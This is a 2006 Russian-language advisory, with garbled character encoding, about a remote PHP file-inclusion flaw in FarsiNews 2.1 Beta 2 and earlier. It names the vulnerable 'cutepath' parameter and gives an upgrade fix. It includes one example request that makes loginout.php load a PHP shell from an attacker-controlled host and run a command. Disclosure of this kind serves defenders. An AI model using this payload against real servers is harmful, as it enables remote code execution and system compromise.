PHP-»нклюдинг в FarsiNews

ƒата публикации:
06.02.2006
ƒата изменени€:
17.10.2006
¬сего просмотров:
2074
ќпасность:
¬ысока€
Ќаличие исправлени€:
ƒа
 оличество у€звимостей:
1
CVSSv2 рейтинг:
CVE ID:
Ќет данных
¬ектор эксплуатации:
”даленна€
¬оздействие:
 омпрометаци€ системы
CWE ID:
Ќет данных
Ќаличие эксплоита:
Ќет данных
”€звимые продукты:
FarsiNews 2.x
”€звимые версии: FarsiNews 2.1 Beta 2 и более ранние версии.

ќписание:
”€звимость позвол€ет удаленному пользователю выполнить произвольный PHPЦсценарий на целевой системе.

”€звимость существует из-за недостаточной обработки входных данных в параметре "cutepath" в сценарии "loginout.php". ”даленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP-код на целевой системе с привилеги€ми Web сервера. ƒл€ успешной эксплуатации у€звимости опци€ "register_globals" должна быть включена. ѕриме:

http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

URL производител€: www.farsinewsteam.com

–ешение: ”становите последнюю версию (2.5) с сайта производител€.

»сточник:

—сылки: Remote File Inclusion in FarsiNews 2.1 and below

или введите им€

CAPTCHA